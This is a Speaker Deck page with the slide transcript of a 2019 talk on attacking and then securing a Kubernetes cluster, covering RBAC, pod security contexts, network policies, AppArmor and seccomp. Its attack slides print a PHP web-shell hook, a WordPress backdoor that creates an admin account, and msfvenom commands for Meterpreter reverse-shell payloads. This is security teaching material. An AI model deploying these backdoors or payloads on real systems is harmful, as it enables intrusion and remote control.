Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Attacking a K8s cluster and how defending it
Search
Johann du Toit
October 31, 2019
Technology
74
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Attacking a K8s cluster and how defending it
Will show how to attack a Kubernetes cluster followed promptly by how to secure your cluster.
Johann du Toit
October 31, 2019
More Decks by Johann du Toit
See All by Johann du Toit
Natural Language, Unnatural Access: The Emerging LLM Attack Pattern
johanndutoit
0
32
RESPECTING THE MICROSERVICE.
johanndutoit
1
87
Why so serious? Using GCP for realtime video context analyzation
johanndutoit
0
89
Progressive Web Apps in 15 Minutes
johanndutoit
0
54
The Machine Learning Intervention
johanndutoit
0
78
Progressive Web Apps
johanndutoit
0
100
Progressive Web Apps
johanndutoit
0
110
Launchpad Start Day 2 - Google Design Sprints
johanndutoit
2
140
Google Design Sprints
johanndutoit
0
99
Other Decks in Technology
See All in Technology
Disciplined Vibes: Scaling AI-Assisted Engineering
sheharyar
0
150
AAIFに入ってみた ~内から見えるコミュニティ動向~
sato4
0
240
AI駆動開発を通して感じた、 AI時代のデザイナーの役割変化
whisaiyo
3
2.2k
Agent Skills設計で柔軟性と硬さのバランスが難しい話
nassy20
0
130
新しいVibe Codingと”自走”について
watany
6
330
2026TECHFRESH畢業分享會 - AI 時代的人生存檔點
line_developers_tw
PRO
0
1.1k
入門!AWS Blocks
ysuzuki
1
130
いまさら聞けない「仕様駆動開発入門」 〜AI活用時代の開発プロセスを考える〜
findy_eventslides
2
130
気軽に使える"情報のハブ"としてのNotion活用 〜フロー情報の集積点 と、 Claude Code × Notion AI〜
syucream
1
130
2026年6月23日 Syncable Tech + Start Python Club にて
hamukazu
0
110
エンジニアリング戦略の作り方 / Crafting Engineering Strategy
iwashi86
21
7k
気づかぬうちにセキュリティ負債を生むAPIキー運用
sgwrmctk
0
130
Featured
See All Featured
The innovator’s Mindset - Leading Through an Era of Exponential Change - McGill University 2025
jdejongh
PRO
1
200
StorybookのUI Testing Handbookを読んだ
zakiyama
31
6.8k
Stewardship and Sustainability of Urban and Community Forests
pwiseman
0
230
Embracing the Ebb and Flow
colly
88
5.1k
[SF Ruby Conf 2025] Rails X
palkan
2
1.1k
Claude Code どこまでも/ Claude Code Everywhere
nwiizo
65
56k
Effective software design: The role of men in debugging patriarchy in IT @ Voxxed Days AMS
baasie
0
410
State of Search Keynote: SEO is Dead Long Live SEO
ryanjones
0
200
What’s in a name? Adding method to the madness
productmarketing
PRO
24
4.1k
DBのスキルで生き残る技術 - AI時代におけるテーブル設計の勘所
soudai
PRO
65
55k
Introduction to Domain-Driven Design and Collaborative software design
baasie
1
840
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.7k
Transcript
Bust a Kube: Let’s attack a Kubernetes cluster and secure
it along the way
None
None
None
None
None
None
WHAT ATTACKING DEFENDING
None
WHAT ATTACKING OMG HELP
None
None
None
PODS NODES SERVICES NAMESPACES
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume
Node Kubelet Container Runtime: Docker Kube-proxy Kubelet C ontainer Runtim
e pod #1 pod #2 pod #3
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic
Services A service is a load balancer, create a DNS
name and ip address that routes traffic to matching labels 10.100.10.1 10.10.10.2 10.10.10.2 service ip address public traffic app=hello tier=web app=hello tier=web
Namespaces Logical grouping of resources and the first hint of
multi-tenancy 10.10.10.2 10.10.10.2 10.10.10.2 10.10.10.2 Marketing Finance
None
> kubectl apply -f app.yaml
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
POD Pods are the smallest unit of work in kubernetes
All containers in a pod share IP 10.10.10.1 10.10.10.2 10.10.10.3 10.10.10.4 ip address pod container volume Attacks Tend to Start from a POD
None
None
<?php add_action('wp_head', 'WordPress_bscript'); function WordPress_bscript() { file_put_contents( "exec.php", ‘<?php echo
shell_exec($_REQUEST[“c”]);’ ); } ?>
None
None
<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')
{ require('wp-includes/registration.php'); If (!username_exists('backdooradmin')) { $user_id = wp_create_user('admin', ‘admin'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>
“Head over to your site and try the function. It’s
fun, completely safe and can help you in the future if you ever need to have a backdoor entry to your website.”
None
None
None
None
None
None
None
Kali Linux
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f sh \ -o clickme.sh
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f elf \ -o clickme
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f exe \ -o clickme.exe
msfvenom \ -p linux/x64/meterpreter/reverse_tcp \ LHOST=<your ip> \ LPORT=<some port>
\ -f macho \ -o clickme.macho
None
None
None
None
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
CONTROL PLANE NETWORKING HOST RUNTIME
CONTROL PLANE NETWORKING HOST RUNTIME
KUBERNETES API SERVER KUBELET CONTAINER RUNTIME ETCD KUBERNETES DASHBOARD
None
None
None
None
None
None
UPGRADE!
None
Role Based Access Control
“RBAC”
None
Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer
apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: namespace: marketing name: secret-reader rules:
- apiGroups: [""] resources: ["secrets"] verbs: ["get", "watch", "list"] Role: MarketingAdmin Role: Developer RoleBinding
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 Step 1: Run as Non Root
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true Step 2: Read Only Filesystem
apiVersion: v1 kind: Pod metadata: name: security-context-demo spec: SecurityContext: runAsUser:
1000 readOnlyRootFileSystem: true allowPrivilegeEscalation: false Step 3: Prevent Escaping
CONTROL PLANE NETWORKING HOST RUNTIME
apiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: allow-db-access spec: podSelector: matchLabels:
tier: database ingress: - from: - podSelector: matchLabels: frontend policyTypes: - Ingress Network Policy
None
None
None
CONTROL PLANE NETWORKING HOST RUNTIME
None
None
Minimal Host OS
None
AppArmor
seccomp
Questions?
• CIS Benchmark - CIS Security • Kube-bench - Aqua
Security • Kube Auto Analyzer - Rory McCune • KubeAudit - Shopify • Sonobuoy - VMWare / Heptio • KubeATF - Symantec
Security is a not a noun you refer to every
now and then, it’s a verb and involves constant and specific action
Thanks!
[email protected]
@signedness
johanndutoit
sheharyar
sato4
whisaiyo
nassy20
watany
line_developers_tw
ysuzuki
findy_eventslides
syucream
hamukazu
iwashi86
sgwrmctk
jdejongh
zakiyama
pwiseman
colly
palkan
nwiizo
baasie
ryanjones
productmarketing
soudai
tammyeverts
![<?php add_action('wp_head', 'WordPress_backdoor'); function WordPress_backdoor() { If ($_GET['backdoor'] == 'go')](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_29.jpg){kind=link}
![Thanks! [email protected] @signedness](https://files.speakerdeck.com/presentations/83900f2b77014b15b5401b7e9b99a5c5/slide_84.jpg){kind=link}